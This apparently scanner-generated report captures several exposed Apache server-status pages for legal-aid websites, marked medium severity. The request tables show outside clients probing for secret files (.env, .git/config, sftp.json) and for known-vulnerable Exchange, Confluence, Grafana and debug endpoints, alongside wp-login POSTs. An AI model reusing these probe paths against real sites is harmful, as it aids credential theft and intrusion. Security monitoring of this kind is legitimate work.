15.158.41.205http/1.1atlantalegalaid.org:8080POST /alas/wp-login.php HTTP/1.1 25-11-0/0/8199. 0.64200.00.00357.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-11-0/0/8613. 0.631000.00.00361.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-11-0/0/7591. 0.832800.00.00281.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-11-0/0/7304. 0.824200.00.00276.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-11-0/0/3751. 0.472200.00.00180.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-11-0/0/6333. 0.564000.00.00263.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-1183481/8/3300K 0.84001.60.18140.89 15.158.41.205http/1.1legalaidconnections.org:8080GET / HTTP/1.1 32-11-0/0/6244. 0.531400.00.00255.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-11-0/0/7385. 0.662700.00.00312.36 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-11-0/0/3656. 4.485200.00.00153.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-11-0/0/6095. 0.555900.00.00223.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-11-0/0/3427. 0.437400.00.00182.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-11-0/0/3156. 0.412300.00.00121.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-11-0/0/5555. 0.393600.00.00238.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-11-0/0/5462. 0.351900.00.00210.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-11-0/0/5792. 0.336500.00.00296.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-11-0/0/3635. 0.253000.00.00118.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-11-0/0/1790. 0.336900.00.0057.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-11-0/0/2060. 0.232400.00.0052.34 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-11-0/0/1589. 0.165300.00.0049.64 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-11142671/3/1844K 0.88001.10.0063.37 70.132.63.132http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 46-11-0/0/1465. 0.194900.00.0046.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-11-0/0/1141. 0.292500.00.0029.96 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-11-0/0/1135. 0.387000.00.0027.43 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-11-0/0/928. 0.433300.00.0043.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-11145253/5/1413K 0.33004.30.0248.69 70.132.63.132http/1.1legalaidconnections.org:8080GET /s/4373e2938313e2432323e23313/_/;/META-INF/maven/com.atlass 51-11-0/0/1333. 0.307600.00.0041.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-11-0/0/914. 0.257100.00.0022.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-11-0/0/1080. 0.306300.00.0043.43 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-11-0/0/1061. 0.192600.00.0047.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-11-0/0/1125. 0.151500.00.0036.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-11-0/0/1034. 0.241600.00.0040.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 57-11-
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627edaf7f9417
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-01-31T14:01:53 Current Time: Tuesday, 14-Feb-2023 05:24:16 UTC Restart Time: Thursday, 02-Feb-2023 06:52:49 UTC Parent Server Config. Generation: 12 Parent Server MPM Generation: 11 Server uptime: 11 days 22 hours 31 minutes 26 seconds Server load: 23.56 21.69 20.82 Total accesses: 648317 - Total Traffic: 29.0 GB CPU Usage: u240.31 s15.29 cu0 cs0 - .0248% CPU load .629 requests/sec - 29.4 kB/second - 46.8 kB/request 15 requests currently being processed, 3 idle workers K..KK.....K..K....K....._......K.............K....K.......K..... .....K...._...W.KW..K...._...................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-11292902/59/35500K 18.49002.21.911662.84 70.132.63.132http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-11-0/0/35706. 15.477313620.00.001621.73 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET /v2/_catalog HTTP/1.1 2-11-0/0/26654. 12.234100.00.001299.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-1162133/12/27065K 0.90003.70.381365.62 70.132.63.132http/1.1legalaidconnections.org:8080GET /.vscode/sftp.json HTTP/1.1 4-11118025/45/32104K 19.90006.71.761471.18 70.132.63.132http/1.1legalaidconnections.org:8080GET /.git/config HTTP/1.1 5-11-0/0/24140. 18.281100.00.001148.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-11-0/0/30659. 26.156200.00.001390.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-11-0/0/23048. 10.71000.00.001136.48 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-11-0/0/28719. 16.291800.00.001364.98 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-11-0/0/21067. 0.486000.00.001040.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-1166951/18/19514K 9.17011.10.97911.59 70.132.63.86http/1.1legalaidconnections.org:8080GET /api/search?folderIds=0 HTTP/1.1 11-11-0/0/18989. 0.522100.00.00907.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-11-0/0/18143. 0.391700.00.00913.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-11131962/7/17081K 1.46006.20.07876.20 70.132.63.132http/1.1legalaidconnections.org:8080GET /info.php HTTP/1.1 14-11-0/0/21875. 0.317200.00.00969.17 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-11-0/0/14935. 0.81500.00.00762.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-11-0/0/19256. 0.613200.00.00896.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-11-0/0/17412. 0.57900.00.00844.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-1177944/9/11533K 0.80005.90.60557.70 70.132.63.132http/1.1legalaidconnections.org:8080GET /about HTTP/1.1 19-11-0/0/16492. 0.54700.00.00763.48 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-11-0/0/16664. 0.82600.00.00679.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-11-0/0/11001. 0.612000.00.00534.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-11-0/0/14239. 0.445500.00.00606.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-11-0/0/13816. 0.494600.00.00567.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-11300320/55/12222_ 21.141913500.02.32563.11 15.158.41.205http/1.1atlantalegalaid.org:8080POST /alas/wp-login.php HTTP/1.1 25-11-0/0/8199. 0.64200.00.00357.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-11-0/0/8613. 0.631000.00.00361.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-11-0/0/7591. 0.832800.00.00281.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-11-0/0/7304. 0.824200.00.00276.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-11-0/0/3751. 0.472200.00.00180.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-11-0/0/6333. 0.564000.00.00263.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-1183481/8/3300K 0.84001.60.18140.89 15.158.41.205http/1.1legalaidconnections.org:8080GET / HTTP/1.1 32-11-0/0/6244. 0.531400.00.00255.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-11-0/0/7385. 0.662700.00.00312.36 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-11-0/0/3656. 4.485200.00.00153.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-11-0/0/6095. 0.555900.00.00223.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-11-0/0/3427. 0.437400.00.00182.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-11-0/0/3156. 0.412300.00.00121.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-11-0/0/5555. 0.393600.00.00238.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-11-0/0/5462. 0.351900.00.00210.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-11-0/0/5792. 0.336500.00.00296.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-11-0/0/3635. 0.253000.00.00118.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-11-0/0/1790. 0.336900.00.0057.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-11-0/0/2060. 0.232400.00.0052.34 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-11-0/0/1589. 0.165300.00.0049.64 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-11142672/4/1845K 0.88002.20.0163.37 70.132.63.132http/1.1legalaidconnections.org:8080GET /debug/default/view?panel=config HTTP/1.1 46-11-0/0/1465. 0.194900.00.0046.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-11-0/0/1141. 0.292500.00.0029.96 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-11-0/0/1135. 0.387000.00.0027.43 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-11-0/0/928. 0.433300.00.0043.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-11145254/6/1414K 0.330145.40.0348.69 70.132.63.132http/1.1legalaidconnections.org:8080GET /login.action HTTP/1.1 51-11-0/0/1333. 0.307600.00.0041.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-11-0/0/914. 0.257100.00.0022.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-11-0/0/1080. 0.306300.00.0043.43 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-11-0/0/1061. 0.192600.00.0047.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-11-0/0/1125. 0.151500.00.0036.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-11-0/0/1034. 0.241600.00.0040.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 57-11-0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627edc92c49a3
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Friday, 16-Dec-2022 04:48:04 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 175 Parent Server MPM Generation: 174 Server uptime: 174 days 22 hours 4 minutes 23 seconds Server load: 0.00 0.01 0.00 Total accesses: 8415067 - Total Traffic: 383.4 GB CPU Usage: u42.49 s4.67 cu0 cs0 - .000312% CPU load .557 requests/sec - 26.6 kB/second - 47.8 kB/request 33 requests currently being processed, 0 idle workers KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKWKSRSSS........................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-174126804/4/523284K 0.00105.50.0124465.59 70.132.4.89http/1.1legalaidconnections.org:8080GET /info.php HTTP/1.1 1-174124365/14/500460K 0.78305.82.6624188.03 70.132.60.147http/1.1legalaidconnections.org:8080GET /login.action HTTP/1.1 2-174126136/11/485642K 0.66307.00.2022675.83 70.132.60.147http/1.1legalaidconnections.org:8080GET /about HTTP/1.1 3-174126197/10/478141K 0.461010.30.1422266.17 70.132.4.89http/1.1legalaidconnections.org:8080GET / HTTP/1.1 4-174126852/2/461359K 0.00102.60.0021577.17 70.132.4.89http/1.1legalaidconnections.org:8080GET /.env HTTP/1.1 5-174122887/37/440300K 2.810012.83.3420913.44 70.132.4.89http/1.1legalaidconnections.org:8080GET / HTTP/1.1 6-174126861/1/420934K 0.00301.00.0020522.42 130.176.17.72http/1.1legalaidconnections.org:8080GET /telescope/requests HTTP/1.1 7-174126951/1/406093K 0.002040.60.0419508.58 130.176.17.72http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 8-174126962/2/392420K 0.00102.80.0018077.22 70.132.4.89http/1.1legalaidconnections.org:8080GET /.git/config HTTP/1.1 9-174123764/19/364968K 1.93304.81.4317337.70 70.132.60.147http/1.1legalaidconnections.org:8080GET /v2/_catalog HTTP/1.1 10-174119806/66/344149K 3.38107.99.2416157.89 70.132.4.89http/1.1legalaidconnections.org:8080GET /.DS_Store HTTP/1.1 11-174127012/2/312174K 0.00102.10.0015015.85 70.132.4.89http/1.1legalaidconnections.org:8080GET /login.action HTTP/1.1 12-174126407/11/290977K 0.59109.60.1413836.29 70.132.4.89http/1.1legalaidconnections.org:8080GET /about HTTP/1.1 13-174124574/12/270390K 1.01108.90.3012653.24 70.132.4.89http/1.1legalaidconnections.org:8080GET /api/search?folderIds=0 HTTP/1.1 14-174124626/31/261528K 1.23107.32.5811866.67 70.132.4.89http/1.1legalaidconnections.org:8080GET /config.json HTTP/1.1 15-174127062/2/241327K 0.00112.80.0011187.82 70.132.4.89http/1.1legalaidconnections.org:8080GET / HTTP/1.1 16-174127151/1/216844K 0.00101.00.009739.32 70.132.4.95http/1.1legalaidconnections.org:8080GET /.env HTTP/1.1 17-174127161/1/185630K 0.00115.10.018760.33 70.132.4.89http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 18-174127211/1/167883K 0.00101.10.008134.28 70.132.4.89http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 19-174127261/1/160929K 0.00101.10.007657.42 70.132.4.89http/1.1legalaidconnections.org:8080GET /telescope/requests HTTP/1.1 20-174127311/1/157480K 0.00101.10.007162.23 70.132.4.157http/1.1legalaidconnections.org:8080GET /info.php HTTP/1.1 21-174127321/1/143247K 0.00101.10.006704.70 70.132.4.89http/1.1legalaidconnections.org:8080GET /debug/default/view?panel=config HTTP/1.1 22-174127371/1/139299K 0.00111.70.006511.35 70.132.4.89http/1.1legalaidconnections.org:8080GET / HTTP/1.1 23-174127421/1/134172K 0.00101.10.006000.56 70.132.4.157http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 24-174127551/1/125243K 0.00001.10.005581.52 70.132.4.89http/1.1legalaidconnections.org:8080GET /s/232313e2531323e2430323e2334313/_/;/META-INF/maven/com.at 25-174127561/1/63540K 0.00011.70.002761.63 70.132.4.89http/1.1legalaidconnections.org:8080GET / HTTP/1.1 26-174122276/41/53240K 3.90107.84.072391.11 70.132.4.89http/1.1legalaidconnections.org:8080GET /api/search?folderIds=0 HTTP/1.1 27-174127611/1/43997K 0.00001.10.001968.44 70.132.4.89http/1.1legalaidconnections.org:8080GET /.env HTTP/1.1 28-174127661/1/47767K 0.00001.10.001945.24 70.132.4.89http/1.1legalaidconnections.org:8080GET /.DS_Store HTTP/1.1 29-174127711/1/39868K 0.00001.10.001651.07 70.132.4.89http/1.1legalaidconnections.org:8080GET /debug/default/view?panel=config HTTP/1.1 30-174127760/0/47675W 0.00000.00.001923.72 70.132.4.89http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 31-174127771/1/37647K 0.00001.10.001624.55 70.132.4.89http/1.1legalaidconnections.org:8080GET /.git/config HTTP/1.1 32-174127780/0/40450L 0.00000.00.001803.10 70.132.4.89http/1.1legalaidconnections.org:8080GET /telescope/requests HTTP/1.1 33-174127831/1/39374K 0.00001.10.001874.79 70.132.4.89http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 34-174127880/0/40390S 0.00171000.00.001781.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-174127890/0/40542S 0.00170900.00.001744.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-174128020/0/38817S 0.00170800.00.001846.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-17400/0/40106S 0.00170700.00.001877.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-174-0/0/42962. 0.00170600.00.001663.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-174-0/0/38845. 0.00170500.00.001704.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-174-0/0/38452. 1.7775700.00.001655.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-174-0/0/7664. 0.00472600.00.00374.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-174-0/0/5134. 0.141599200.00.00195.43 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-174-0/0/5418. 0.271598500.00.00197.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-174-0/0/3188. 0.131599400.00.00168.07 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-174-0/0/3257. 0.251597800.00.00168.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-174-0/0/2829. 0.251598000.00.0079.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-174-0/0/2659. 0.271598600.00.00111.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-174-0/0/2698. 0.221598700.00.0093.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-174-0/0/2215. 0.131599700.00.0078.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-174-0/0/2096. 0.241598800.00.0095.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-174-0/0/2161. 0.231598300.00.0089.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-174-0/0/2669. 0.231598400.00.0089.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-174-
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed0a104e87
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Friday, 16-Dec-2022 04:48:02 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 175 Parent Server MPM Generation: 174 Server uptime: 174 days 22 hours 4 minutes 21 seconds Server load: 0.00 0.01 0.00 Total accesses: 8415037 - Total Traffic: 383.4 GB CPU Usage: u43.93 s4.78 cu0 cs0 - .000322% CPU load .557 requests/sec - 26.6 kB/second - 47.8 kB/request 17 requests currently being processed, 0 idle workers KKKKKWKKKKKKKKKK..........K..................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-174126803/3/523283K 0.00104.40.0024465.59 70.132.4.89http/1.1legalaidconnections.org:8080GET /api/search?folderIds=0 HTTP/1.1 1-174124365/14/500460K 0.78205.82.6624188.03 70.132.60.147http/1.1legalaidconnections.org:8080GET /login.action HTTP/1.1 2-174126136/11/485642K 0.66207.00.2022675.83 70.132.60.147http/1.1legalaidconnections.org:8080GET /about HTTP/1.1 3-174126195/8/478139K 0.46007.50.1322266.17 70.132.4.89http/1.1legalaidconnections.org:8080GET / HTTP/1.1 4-174126851/1/461358K 0.00111.60.0021577.17 70.132.4.89http/1.1legalaidconnections.org:8080GET / HTTP/1.1 5-174122884/34/440297W 2.81004.93.3320913.43 70.132.4.89http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 6-174126861/1/420934K 0.00101.00.0020522.42 130.176.17.72http/1.1legalaidconnections.org:8080GET /telescope/requests HTTP/1.1 7-174126951/1/406093K 0.000040.60.0419508.58 130.176.17.72http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 8-174126961/1/392419K 0.00011.70.0018077.22 70.132.4.89http/1.1legalaidconnections.org:8080GET / HTTP/1.1 9-174123764/19/364968K 1.93204.81.4317337.70 70.132.60.147http/1.1legalaidconnections.org:8080GET /v2/_catalog HTTP/1.1 10-174119806/66/344149K 3.38007.99.2416157.89 70.132.4.89http/1.1legalaidconnections.org:8080GET /.DS_Store HTTP/1.1 11-174127011/1/312173K 0.00001.10.0015015.85 70.132.4.89http/1.1legalaidconnections.org:8080GET /telescope/requests HTTP/1.1 12-174126405/9/290975K 0.59006.90.1413836.29 70.132.4.89http/1.1legalaidconnections.org:8080GET / HTTP/1.1 13-174124573/11/270389K 1.01107.70.3012653.24 70.132.4.89http/1.1legalaidconnections.org:8080GET /v2/_catalog HTTP/1.1 14-174124624/29/261526K 1.23104.92.5711866.67 70.132.4.89http/1.1legalaidconnections.org:8080GET /config.json HTTP/1.1 15-174127061/1/241326K 0.00001.10.0011187.82 70.132.4.89http/1.1legalaidconnections.org:8080GET /.git/config HTTP/1.1 16-174-0/0/216843. 1.5557700.00.009739.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-174-0/0/185629. 0.0059200.00.008760.33 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-174-0/0/167882. 0.0059100.00.008134.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-174-0/0/160928. 0.0059000.00.007657.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-174-0/0/157479. 0.0058900.00.007162.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-174-0/0/143246. 0.0058800.00.006704.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-174-0/0/139298. 0.0058700.00.006511.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-174-0/0/134171. 0.0058600.00.006000.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-174-0/0/125242. 0.00167400.00.005581.52 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-174-0/0/63539. 0.00167200.00.002761.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-174122275/40/53239K 3.90006.74.062391.11 70.132.4.89http/1.1legalaidconnections.org:8080GET /telescope/requests HTTP/1.1 27-174-0/0/43996. 0.00166900.00.001968.44 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-174-0/0/47766. 0.00168900.00.001945.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-174-0/0/39867. 0.00168800.00.001651.07 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-174-0/0/47675. 0.00168500.00.001923.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-174-0/0/37646. 0.00168600.00.001624.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-174-0/0/40450. 0.00168700.00.001803.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-174-0/0/39373. 0.00171000.00.001874.79 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-174-0/0/40390. 0.00170900.00.001781.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-174-0/0/40542. 0.00170800.00.001744.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-174-0/0/38817. 0.00170700.00.001846.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-174-0/0/40106. 0.00170600.00.001877.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-174-0/0/42962. 0.00170500.00.001663.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-174-0/0/38845. 0.00170400.00.001704.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-174-0/0/38452. 1.7775600.00.001655.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-174-0/0/7664. 0.00472400.00.00374.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-174-0/0/5134. 0.141599100.00.00195.43 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-174-0/0/5418. 0.271598400.00.00197.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-174-0/0/3188. 0.131599300.00.00168.07 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-174-0/0/3257. 0.251597700.00.00168.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-174-0/0/2829. 0.251597900.00.0079.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-174-0/0/2659. 0.271598500.00.00111.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-174-0/0/2698. 0.221598600.00.0093.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-174-0/0/2215. 0.131599600.00.0078.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-174-0/0/2096. 0.241598700.00.0095.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-174-0/0/2161. 0.231598200.00.0089.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-174-0/0/2669. 0.231598300.00.0089.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-174-0/0/2064. 0.261597400.00.0068.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-174-0/0/2158. 0.771591400.00.0091.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-174-0/0/1850. 0.241598100.00.0083.24 ::1http/1.1atlantalegalaid.org:8080<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed51ecec1d
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Friday, 16-Dec-2022 04:48:00 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 175 Parent Server MPM Generation: 174 Server uptime: 174 days 22 hours 4 minutes 19 seconds Server load: 0.00 0.01 0.00 Total accesses: 8415015 - Total Traffic: 383.4 GB CPU Usage: u44.74 s4.85 cu0 cs0 - .000328% CPU load .557 requests/sec - 26.6 kB/second - 47.8 kB/request 11 requests currently being processed, 0 idle workers KKKK.K...KK.KWK...........K..................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-174126801/1/523281K 0.00011.60.0024465.58 70.132.4.89http/1.1legalaidconnections.org:8080GET / HTTP/1.1 1-174124365/14/500460K 0.78005.82.6624188.03 70.132.60.147http/1.1legalaidconnections.org:8080GET /login.action HTTP/1.1 